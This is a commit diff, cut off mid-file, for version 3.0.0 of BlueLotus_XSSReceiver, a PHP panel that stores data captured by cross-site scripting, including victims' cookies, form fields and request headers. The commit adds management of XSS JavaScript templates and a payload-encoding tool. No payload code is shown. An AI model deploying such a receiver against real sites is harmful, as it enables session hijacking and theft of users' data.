firesunCN/BlueLotus_XSSReceiver
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Version 3.0.0

Browse Source 
1. 完成js模板,我的js模块,可以直接添加修改用于xss的js
2. 采用ace编辑器实现js代码高亮与错误检测
3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩
4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload
5. 增加加密方式RC4,更改默认加密方式为RC4
6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤
7. 修复一系列bug
This commit is contained in:
firesun
2016-01-24 01:07:17 +08:00
parent f5ab50bb89
commit 264460650b
73 changed files with 6487 additions and 1177 deletions
Download Patch File Download Diff File Expand all files Collapse all files

516
admin.php
View File

@@ -6,39 +6,19 @@ require("auth.php");
<html>
<head>
<meta charset="utf-8" />
<title>控制面板</title>
<link rel="stylesheet" href="static/css/bootstrap.min.css" type="text/css" />
<link rel="stylesheet" href="static/css/Site.css" type="text/css" />
<link rel="stylesheet" href="static/css/notification.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.base.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.office.css" type="text/css" />
<link rel="stylesheet" href="static/css/animate.css" type="text/css" />
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript" src="static/js/bootstrap.min.js"></script>
<script type="text/javascript" src="static/js/jquery-ui.min.js"></script>
<script type="text/javascript" src="static/js/notification.js"></script>
<script type="text/javascript" src="static/js/localization.js"></script>
<script type="text/javascript" src="static/js/jqxcore.js"></script>
<script type="text/javascript" src="static/js/jqxdata.js"></script>
<script type="text/javascript" src="static/js/jqxbuttons.js"></script>
<script type="text/javascript" src="static/js/jqxscrollbar.js"></script>
<script type="text/javascript" src="static/js/jqxmenu.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.selection.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.edit.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.sort.js"></script>
<script type="text/javascript" src="static/js/jqxtabs.js"></script>
<script type="text/javascript" src="static/js/getTheme.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.columnsresize.js"></script>
<script type="text/javascript" src="static/js/jqxwindow.js"></script>
<script type="text/javascript" src="static/js/jqxdropdownlist.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.pager.js"></script>
<script type="text/javascript" src="static/js/jqxlistbox.js"></script>
<script type="text/javascript" src="static/js/loadgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.filter.js"></script>
<meta charset="utf-8" />
<title>控制面板</title>
<link rel="stylesheet" href="static/css/bootstrap.min.css" type="text/css" />
<link rel="stylesheet" href="static/css/main.css" type="text/css" />
<link rel="stylesheet" href="static/css/notification.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.base.css" type="text/css" />
<link rel="stylesheet" href="static/css/jqx.office.css" type="text/css" />
<link rel="stylesheet" href="static/css/animate.css" type="text/css" />
</head>
<body>
@@ -57,189 +37,375 @@ require("auth.php");
<div class="collapse navbar-collapse" id="sidebar-nav" role="navigation">
<ul id="Tab" class="nav">
<li class="active">
<a href="#panel" data-toggle="tab">
<a id="xss_panel_tab" href="#panel" data-toggle="tab">
<span class="icon icon-panel"></span>接收面板</a>
</li>
<li>
<a href="#js" data-toggle="tab">
<a id="my_js_tab" href="#js" data-toggle="tab">
<span class="icon icon-my-js"></span>我的JS</a>
</li>
<li>
<a href="#template" data-toggle="tab">
<a id="js_template_tab" href="#template" data-toggle="tab">
<span class="icon icon-template"></span>公共模板</a>
</li>
<li>
<a href="#aboutus" data-toggle="tab">
<a id="about_us_tab" href="#aboutus" data-toggle="tab">
<span class="icon icon-info"></span>关于</a>
</li>
<li id="logout">
<a href="#logout" >
<span class="icon icon-logout"></span>注销</a>
<li id="logout">
<a href="#logout">
<span class="icon icon-logout"></span>注销</a>
</li>
</ul>
<span id="rights">Copyright © 2015-2016<br>Powered by <a href="http://firesun.me" target="_blank">Firesun</a></span>
<span id="rights">Copyright © 2015-2016<br>Powered by <a href="http://www.firesun.me" target="_blank">Firesun</a></span>
</div>
</div>
<div class="tab-content">
<div id="panel" class="tab-pane active main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">XSS接收面板</h2>
<div style="clear:both;"></div>
</div>
<div id="panelGrid"></div>
</div>
<div id="js" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">我的js</h2>
<div style="clear:both;"></div>
</div>
<div id="myJS"></div>
</div>
<div id="template" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">js模板</h2>
<div style="clear:both;"></div>
</div>
<div id="jsTemplate"></div>
</div>
<div id="aboutus" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">关于</h2>
<div style="clear:both;"></div>
</div>
<div id="about_detail">
</div>
</div>
</div>
</div>
</div>
<div id="notifications-bottom-right"></div>
<div style="display: none;">
<div id="searchWindow" class="windows">
<div>
查找记录</div>
<div style="overflow: hidden;">
<div>
关键字:</div>
<div style='margin-top:5px;'>
<input id='inputField' type="text" class="jqx-input" style="width: 200px; height: 23px;" />
</div>
<div style="margin-top: 7px; clear: both;">
列名:</div>
<div style='margin-top:5px;'>
<div id='dropdownlist'>
</div>
</div>
<div>
<input type="button" style='margin-top: 15px; margin-left: 50px; float: left;' value="查找" id="findButton" />
<input type="button" style='margin-left: 5px; margin-top: 15px; float: left;' value="清除" id="clearButton" />
</div>
</div>
</div>
<div id="deleteConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
您确认执行删除操作么?
<div class="tab-content">
<div id="panel" class="tab-pane active main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">XSS接收面板</h2>
<div class="clear"></div>
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="deleteConfirm_ok" value="确认" style="margin-right: 10px" />
<input type="button" id="deleteConfirm_cancel" value="取消" />
<div id="panelGrid"></div>
</div>
<div id="js" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">我的js</h2>
<div class="clear"></div>
</div>
<div id="myJS">
<div id="myJS_splitter">
<div class="overflow-hidden" >
<div class="listbox" id="myJS_listbox">
</div>
<div id="myJS_listbox_toolbar" class="overflow-hidden listbox_toolbar">
<div id="myJS_add_button"><img class="listbox_toolbar_button_icon" src='static/images/add.png' /><span class="listbox_toolbar_button_span">添加</span></div>
<div id="myJS_del_button"><img class="listbox_toolbar_button_icon" src='static/images/delete.png' /><span class="listbox_toolbar_button_span">删除</span></div>
<div id="myJS_clear_button"><img class="listbox_toolbar_button_icon" src='static/images/clear.png' /><span class="listbox_toolbar_button_span">清空</span></div>
</div>
</div>
<div class="overflow-hidden" id="myJS_ContentPanel">
<div class="js_content_panel">
<form id="myJS_form">
<div class="js_content_div">
<span>文件名:</span>
<input id="myJS_name" />.js
</div>
<div class="js_content_div">
<div>模板说明:</div>
<textarea id="myJS_description" ></textarea>
</div>
<div class="editor">
<div id="myJS_content_toolBar" ></div>
<div id="myJS_content" ></div>
</div>
<div class="js_content_button_div">
<button id="myJS_ok" type="button">新增</button>
<button id="myJS_cancel" type="button">重置</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="logoutConfirmWindow" class="windows">
<div id="template" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">js模板</h2>
<div class="clear"></div>
</div>
<div id="jsTemplate">
<div id="jsTemplate_splitter">
<div class="overflow-hidden" >
<div class="listbox" id="jsTemplate_listbox">
</div>
<div id="jsTemplate_listbox_toolbar" class="overflow-hidden listbox_toolbar">
<div id="jsTemplate_add_button"><img class="listbox_toolbar_button_icon" src='static/images/add.png' /><span class="listbox_toolbar_button_span">添加</span></div>
<div id="jsTemplate_del_button"><img class="listbox_toolbar_button_icon" src='static/images/delete.png' /><span class="listbox_toolbar_button_span">删除</span></div>
<div id="jsTemplate_clear_button"><img class="listbox_toolbar_button_icon" src='static/images/clear.png' /><span class="listbox_toolbar_button_span">清空</span></div>
</div>
</div>
<div class="overflow-hidden" id="jsTemplate_ContentPanel">
<div class="js_content_panel">
<form id="jsTemplate_form">
<div class="js_content_div">
<span>文件名:</span>
<input id="jsTemplate_name" />.js
</div>
<div class="js_content_div">
<div>模板说明:</div>
<textarea id="jsTemplate_description"></textarea>
</div>
<div class="editor">
<div id="jsTemplate_content_toolBar" ></div>
<div id="jsTemplate_content" ></div>
</div>
<div class="js_content_button_div">
<button id="jsTemplate_ok" type="button">新增</button>
<button id="jsTemplate_cancel" type="button">重置</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="aboutus" class="tab-pane main-section col-xs-12 column">
<div class="main-section-header row">
<h2 class="eam-efficiency col-xs-3">关于</h2>
<div class="clear" ></div>
</div>
<div id="about_detail" >
<section id="about_us_banner" style="background-position: 50% 0px;">
<div id="firesun" class="content">
<header class="header">
<h2>火日攻天@firesun</h2>
<p>蓝莲花战队负责端茶送水的<br>邮箱:<a href="mailto:firesun.cn@gmail.com">firesun.cn@gmail.com</a><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;主页:<a href="http://www.firesun.me/" target="_blank_">http://www.firesun.me/</a></p>
</header>
<span class="image"><img class="img" src="static/images/avatar.png"></span>
</div>
<div ></div >
<div class="content">
<header class="header">
<h2>蓝莲花战队</h2>
<p>源自清华大学的网安技术竞赛与研究团队<br>中国CTF竞赛成绩最突出的国际知名战队<br>
主页:<a href="http://www.blue-lotus.net/" target="_blank_">http://www.blue-lotus.net/</a></p>
</header>
<span class="logoimage"><img class="logoimg" src="static/images/bluelotus.png"></span>
</div>
</section>
</div>
</div>
</div>
</div>
</div>
<div id="notifications-bottom-right"></div>
<div id="tip-windows" class="display-none">
<div id="xssorWindow" class="windows">
<div id="Ww_B_0" class="Ww_B">
<div id="Ww_B_0_Left">
<textarea id="Ww_B_0_textarea"></textarea>
</div>
<div id="Ww_B_0_Right">
<input type="button" id="rwb_b2" value="→16en" />
<input type="button" id="rwb_b2_j" value="De" />
<input type="radio" name="rwb_b2_c" id="rwb_b2_c1" checked="checked" />\u<input type="radio" name="rwb_b2_c" id="rwb_b2_c2" />&amp;#x;<br />
<input type="button" id="rwb_b1" value="→10en" /> <input type="button" id="rwb_b1_j" value="De" />
<input type="radio" name="rwb_b1_c" id="rwb_b1_c1" checked="checked" />,<input type="radio" name="rwb_b1_c" id="rwb_b1_c4" />c<input type="radio" name="rwb_b1_c" id="rwb_b1_c2" />&amp;#<input type="radio" name="rwb_b1_c" id="rwb_b1_c3" />&amp;#;
<br />
<input type="button" id="rwb_b3" value="escape" /> <span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b3j" value="unescape" />
<br />
<input type="button" id="rwb_b4" value="encodeURI" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b4j" value="decodeURI" />
<br />
<input type="button" id="rwb_b5" value="Html2JS" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b5j" value="JS2Html" />
<br />
<input type="button" id="rwb_b6" value="HtmlEncode" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b6j" value="HtmlDecode" />
<br />
<input type="button" id="rwb_b7" value="base64En" />
<span style="font-size:18px">&harr;</span>
<input type="button" id="rwb_b7j" value="base64De" />
<br /><br />
<input type="button" id="rwb_b8" value="replace" />
<input type="text" name="oldC" id="oldC" size="5" />
<span style="font-size:18px">&rarr;</span>
<input type="text" name="newC" id="newC" size="5" />
<br /><br />
</div>
</div>
</div>
<div id="searchWindow" class="windows">
<div>
查找记录</div>
<div class="overflow-hidden">
<div>
关键字:</div>
<div class="search_input_field">
<input id='search_input_field' type="text" class="jqx-input" />
</div>
<div class="search_div">
列名:</div>
<div class="dropdownlist">
<div id='dropdownlist'>
</div>
</div>
<div>
<input type="button" value="查找" id="findButton" />
<input type="button" value="清除" id="clearButton" />
</div>
</div>
</div>
<div id="deleteConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" /> 确认
</div>
<div>
<div class="windows-tip-div">
您确认执行删除操作吗?
</div>
<div>
<div class="windows-button-div">
<input type="button" id="deleteConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="deleteConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="logoutConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
<div class="windows-tip-div">
您确认注销吗?
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="logoutConfirm_ok" value="确认" style="margin-right: 10px" />
<div class="windows-button-div">
<input type="button" id="logoutConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="logoutConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="clearConfirmWindow" class="windows">
<div id="clearConfirmWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/help.png" alt="" /> 确认
</div>
<div>
<div class="windows-tip-div">
您确认清空所有记录吗?
</div>
<div>
<img width="14" height="14" src="static/images/help.png" alt="" />
确认</div>
<div>
<div style="margin: 5px;">
您确认清空所有记录么?
</div>
<div>
<div style="float: right; margin-top: 15px;">
<input type="button" id="clearConfirm_ok" value="确认" style="margin-right: 10px" />
<div class="windows-button-div">
<input type="button" id="clearConfirm_ok" value="确认" class="windows-button" />
<input type="button" id="clearConfirm_cancel" value="取消" />
</div>
</div>
</div>
</div>
<div id="failedWindow" class="windows">
</div>
</div>
<div id="failedWindow" class="windows">
<div>
<img width="14" height="14" src="static/images/close.png" alt="" /> 失败
</div>
<div>
<div class="windows-tip-div">
操作失败!
</div>
<div>
<img width="14" height="14" src="static/images/close.png" alt="" />
失败</div>
<div>
<div style="margin: 5px;">
操作失败!
</div>
<div>
<div style="float: right; margin-top: 15px;">
<div class="windows-button-div">
<input type="button" id="failed_ok" value="确认" />
</div>
</div>
</div>
</div>
</div >
<script id="xss-detail-template" type="text/template">
<div style='margin: 10px;'>
<ul style='margin-left: 30px;'>
<li>GET</li>
<li>POST</li>
<li>Cookie</li>
<li>HTTP请求信息</li>
<li>其他信息</li>
</ul>
<div class='get_grid'></div>
<div class='post_grid'></div>
<div class='cookie_grid'></div>
<div class='headers_grid'></div>
<div class='information'></div>
</div>
</script>
</div>
</div>
</div>
<!-- xss记录detail面板写成script的加载速度比div快-->
<script id="xss-detail-template" type="text/template">
<div style='margin: 10px;'>
<ul style='margin-left: 30px;'>
<li>GET</li>
<li>POST</li>
<li>Cookie</li>
<li>HTTP请求信息</li>
<li>其他信息</li>
</ul>
<div class='get_grid'></div>
<div class='post_grid'></div>
<div class='cookie_grid'></div>
<div class='headers_grid'></div>
<div class='information'></div>
</div>
</script>
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript" src="static/js/jquery-ui.min.js"></script>
<script type="text/javascript" src="static/js/bootstrap.min.js"></script>
<script type="text/javascript" src="static/js/beautify.js"></script>
<script type="text/javascript" src="static/js/ZeroClipboard.min.js"></script>
<script type="text/javascript" src="static/js/ace.js"></script>
<script type="text/javascript" src="static/js/jsmin.js"></script>
<script type="text/javascript" src="static/js/js_encode.js"></script>
<script type="text/javascript" src="static/js/jqxcore.js"></script>
<script type="text/javascript" src="static/js/jqxdata.js"></script>
<script type="text/javascript" src="static/js/jqxbuttons.js"></script>
<script type="text/javascript" src="static/js/jqxscrollbar.js"></script>
<script type="text/javascript" src="static/js/jqxmenu.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.selection.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.edit.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.sort.js"></script>
<script type="text/javascript" src="static/js/jqxtabs.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.columnsresize.js"></script>
<script type="text/javascript" src="static/js/jqxwindow.js"></script>
<script type="text/javascript" src="static/js/jqxdropdownlist.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.pager.js"></script>
<script type="text/javascript" src="static/js/jqxlistbox.js"></script>
<script type="text/javascript" src="static/js/jqxgrid.filter.js"></script>
<script type="text/javascript" src="static/js/jqxsplitter.js"></script>
<script type="text/javascript" src="static/js/jqxtoolbar.js"></script>
<script type="text/javascript" src="static/js/jqxcombobox.js"></script>
<script type="text/javascript" src="static/js/jqxinput.js"></script>
<script type="text/javascript" src="static/js/jqxtextarea.js"></script>
<script type="text/javascript" src="static/js/getTheme.js"></script>
<script type="text/javascript" src="static/js/localization.js"></script>
<script type="text/javascript" src="static/js/loadxsspanel.js"></script>
<script type="text/javascript" src="static/js/loadjstemplate.js"></script>
<script type="text/javascript" src="static/js/loadmyjs.js"></script>
<script type="text/javascript" src="static/js/notification.js"></script>
</body>
</html>
</html>

256
api.php
View File

@@ -5,76 +5,280 @@ require_once("functions.php");
require_once("config.php");
require_once("dio.php");
header('Content-Type: application/json');
//时间戳的正则表达式
define('ID_REGEX', '/^[0-9]{10}$/');
//合法文件名的正则表达式
define('FILE_REGEX', '/(?!((^(con)$)|^(con)\..*|(^(prn)$)|^(prn)\..*|(^(aux)$)|^(aux)\..*|(^(nul)$)|^(nul)\..*|(^(com)[1-9]$)|^(com)[1-9]\..*|(^(lpt)[1-9]$)|^(lpt)[1-9]\..*)|^\s+|.*\s$)(^[^\/\\\:\*\?\"\<\>\|]{1,255}$)/');
//与xss记录相关api
if(isset($_GET['cmd']))
{
switch($_GET['cmd'])
{
//所有记录包括详细信息
//获取所有记录包括详细信息
case 'list':
echo json_encode(dirList());
echo json_encode(xss_record_detail_list());
break;
//只列出时间戳索引id
case 'simplelist':
echo json_encode(dirSimpleList());
//只获取时间戳索引id
case 'id_list':
echo json_encode(xss_record_id_list());
break;
//根据时间戳索引id获得单条信息
case 'get':
if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
echo json_encode(loadInfo($_GET['id']));
if(isset($_GET['id'])&&preg_match(ID_REGEX,$_GET['id']))
echo json_encode(load_xss_record($_GET['id']));
else
echo json_encode(false);
break;
//根据时间戳索引id删除单条信息
case 'del':
if(isset($_GET['id'])&&preg_match('/^[0-9]{10}$/',$_GET['id']))
echo json_encode(delInfo($_GET['id']));
if(isset($_GET['id'])&&preg_match(ID_REGEX,$_GET['id']))
echo json_encode(delete_xss_record($_GET['id']));
else
echo json_encode(false);
break;
//清空记录
case 'clear':
echo json_encode(clearInfo());
echo json_encode(clear_xss_record());
break;
default:
echo json_encode(false);
}
}
//与js模板相关api
else if(isset($_GET['js_template_cmd']))
{
switch($_GET['js_template_cmd'])
{
//获取所有js模板的名字与描述
case 'list':
echo json_encode(js_name_and_desc_list(JS_TEMPLATE_PATH));
break;
//添加js模板
case 'add':
if(isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(JS_TEMPLATE_PATH))
echo json_encode(false);
else
{
save_js_desc(JS_TEMPLATE_PATH,$_POST['desc'],$_POST['name']);
save_js_content(JS_TEMPLATE_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//修改js模板
case 'modify':
if(isset($_POST['old_name'])&&isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['old_name'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(JS_TEMPLATE_PATH))
echo json_encode(false);
else
{
if($_POST['old_name']!=$_POST['name'])
delete_js(JS_TEMPLATE_PATH,$_POST['old_name']);
save_js_desc(JS_TEMPLATE_PATH,$_POST['desc'],$_POST['name']);
save_js_content(JS_TEMPLATE_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//获取某一js模板的内容
case 'get':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(load_js_content(JS_TEMPLATE_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//删除js模板
case 'del':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(delete_js(JS_TEMPLATE_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//清空js模板
case 'clear':
echo json_encode(clear_js(JS_TEMPLATE_PATH));
break;
default:
echo json_encode(false);
}
}
//与我的js相关api
else if(isset($_GET['my_js_cmd']))
{
switch($_GET['my_js_cmd'])
{
//获取所有我的js的名字与描述
case 'list':
echo json_encode(js_name_and_desc_list(MY_JS_PATH));
break;
//添加js模板
case 'add':
if(isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(MY_JS_PATH))
echo json_encode(false);
else
{
save_js_desc(MY_JS_PATH,$_POST['desc'],$_POST['name']);
save_js_content(MY_JS_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//修改js模板
case 'modify':
if(isset($_POST['old_name'])&&isset($_POST['name'])&&isset($_POST['desc'])&&isset($_POST['content'])&&preg_match(FILE_REGEX,$_POST['old_name'])&&preg_match(FILE_REGEX,$_POST['name']))
{
if(!is_writable(MY_JS_PATH))
echo json_encode(false);
else
{
if($_POST['old_name']!=$_POST['name'])
delete_js(MY_JS_PATH,$_POST['old_name']);
save_js_desc(MY_JS_PATH,$_POST['desc'],$_POST['name']);
save_js_content(MY_JS_PATH,$_POST['content'],$_POST['name']);
echo json_encode(true);
}
}
else
echo json_encode(false);
break;
//获取某一js模板的内容
case 'get':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(load_js_content(MY_JS_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//删除js模板
case 'del':
if(isset($_GET['name'])&&preg_match(FILE_REGEX,$_GET['name']))
echo json_encode(delete_js(MY_JS_PATH,$_GET['name']));
else
echo json_encode(false);
break;
//清空js模板
case 'clear':
echo json_encode(clear_js(MY_JS_PATH));
break;
default:
echo json_encode(false);
}
}
else
echo json_encode(false);
function dirSimpleList() {
function xss_record_id_list() {
$files = glob(DATA_PATH . '/*.php');
foreach ($files as &$file){
$file=basename($file,".php");
$list=array();
foreach ($files as $file){
$filename=basename($file,".php");
if( preg_match(ID_REGEX, $filename) )
$list[]=$filename;
}
return $files;
return $list;
}
function dirList() {
function xss_record_detail_list() {
$list=array();
$files = glob(DATA_PATH . '/*.php');
arsort($files);
foreach ($files as $file) {
$filename=basename($file,".php");
$info=loadInfo($filename);
$isChange=false;
//如果没有设置location就查询qqwry.dat判断location
if(!isset($info['location']))
if( preg_match(ID_REGEX, $filename) )
{
$info['location']=convertip($info['user_IP'],IPDATA_PATH);
$isChange=true;
$info=load_xss_record($filename);
if($info===false)
continue;
$isChange=false;
//如果没有设置location就查询qqwry.dat判断location
if(!isset($info['location']))
{
$info['location']=stripStr( convertip($info['user_IP'],IPDATA_PATH) );
$isChange=true;
}
if($isChange)
save_xss_record(json_encode($info),$filename);
$list[]= $info;
}
if($isChange)
saveInfo(json_encode($info),$filename);
$list[]= $info;
}
return $list;
}
//获取js的名字与描述列表
function js_name_and_desc_list($path)
{
$list=array();
$files = glob($path . '/*.js');
arsort($files);
foreach ($files as $file){
//由于可能有中文名,故使用正则来提取文件名
$item=array();
$item['js_uri']=$file;
$filename=preg_replace('/^.+[\\\\\\/]/', '', $file);
$filename=substr ( $filename , 0 , strlen ($filename)-3 );
$item['js_name']=$filename;
$item['js_name_abbr']=stripStr($filename);
$result=@file_get_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc');
$result=$result?$result:"";
$result=decrypt($result);
if(json_encode($result)===false)
$result="加密密码不符,无法获得描述";
$item['js_description']=$result;
$item['js_description_abbr']=stripStr($result);
//特别注意只有js_name_abbrjs_description_abbr经过stripStr处理
$list[]= $item;
}
return $list;
}
?>

6
auth.php
View File

@@ -20,8 +20,8 @@ if(!(isset($_SESSION['isLogin']) && $_SESSION['isLogin']===true && isset($_SESSI
}
//开启CSP
header("Content-Security-Policy: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("X-Content-Security-Policy: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("X-WebKit-CSP: default-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline'; frame-src 'none'");
header("Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-src 'none'");
header("X-Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-src 'none'");
header("X-WebKit-CSP: default-src 'self'; style-src 'self' 'unsafe-inline';img-src 'self' data:; frame-src 'none'");
?>

150
change_encrypt_pass.php Normal file
View File

@@ -0,0 +1,150 @@
<?php
//本文件未鉴权,安全起见默认禁用此php文件,需要时自行注释exit()
exit();
/*
* 当修改config.php里的加密方式或者加密密码时,可用此文件来重新加密xss记录,js的描述,ip封禁列表
* 请在修改加密方式或者加密密码后执行此文件(如果选择不加密,加密密码写任意值)
* 用法:
* php change_encrypt_pass.php (以前是否加密true/false) (旧加密密码) (旧加密方法AES/RC4) (现在是否加密) (新加密密码) (新加密方法)
* 举例
* php change_encrypt_pass.php true bluelotus AES true bluelotus RC4
* php change_encrypt_pass.php true bluelotus AES false xxxx(任意值) AES
*/
/*
* 从旧版本升级的方法
* 1. php change_encrypt_pass.php update (以前是否加密true/false) (旧加密密码)
* 此时所有xss记录转化为加密开启密码bluelotus加密方法RC4
* 2. 修改config.php修改加密开关新密码加密方式
* 3. php change_encrypt_pass.php true bluelotus rc4 (现在是否加密) (新加密密码) (新加密方法)
* 4. 升级完成
*/
define("IN_XSS_PLATFORM",true);
require_once("config.php");
if($argv[1]==="update")
update_from_old_version($argv[2],$argv[3]);
else
change_pass($argv[1],$argv[2],$argv[3],$argv[4],$argv[5],$argv[6]);
function update_from_old_version($old_enable_encrypt,$old_encrypt_pass){
//如果从旧版本升级就统一先切换为RC4密码bluelotus
modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,"AES","true","bluelotus", "RC4");
modify_xss_record($old_enable_encrypt,$old_encrypt_pass,"AES","true","bluelotus","RC4");
}
function change_pass($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_xss_record($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_js_desc(MY_JS_PATH,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
modify_js_desc(JS_TEMPLATE_PATH,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type);
}
function modify_ForbiddenIPList($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$logfile = DATA_PATH . '/forbiddenIPList.dat';
$str = @file_get_contents( $logfile );
if($str===false)
return;
$str=decrypt($str,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
$str=encrypt($str, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents($logfile, $str))
echo "修改封禁ip成功\n";
else
echo "修改封禁ip失败可能是没有权限chmod 777\n";
}
function modify_xss_record($old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$files = glob(DATA_PATH . '/*.php');
foreach ($files as $file) {
$filename=basename($file,".php");
if( preg_match("/^[0-9]{10}$/", $filename) )
{
$logFile = dirname( __FILE__ ).'/'.DATA_PATH.'/'.$filename.'.php';
$info=@file_get_contents($logFile);
if($info!==false && strncmp($info,'<?php exit();?>',15)===0)
{
$info=substr($info,15);
$info=decrypt($info,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
}
else
$info="";
$info=encrypt($info, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents($logFile, '<?php exit();?>'.$info))
echo "修改一条xss记录成功\n";
else
echo "修改一条xss记录失败可能是没有权限chmod 777\n";
}
}
}
function modify_js_desc($path,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type,$new_enable_encrypt,$new_encrypt_pass, $new_encrypt_type)
{
$files = glob($path . '/*.js');
foreach ($files as $file){
//由于可能有中文名,故使用正则来提取文件名
$filename=preg_replace('/^.+[\\\\\\/]/', '', $file);
$filename=substr ( $filename , 0 , strlen ($filename)-3 );
$desc=@file_get_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc');
if($desc!==false)
$desc=decrypt($desc,$old_enable_encrypt,$old_encrypt_pass,$old_encrypt_type);
else
$desc="";
$desc=encrypt($desc, $new_enable_encrypt, $new_encrypt_pass, $new_encrypt_type);
if(@file_put_contents(dirname( __FILE__ ).'/'.$path.'/'.$filename.'.desc', $desc))
echo "修改一条js描述成功\n";
else
echo "修改一条js描述失败可能是没有权限chmod 777\n";
}
}
function encrypt($info,$enable_encrypt,$encrypt_pass,$encrypt_type)
{
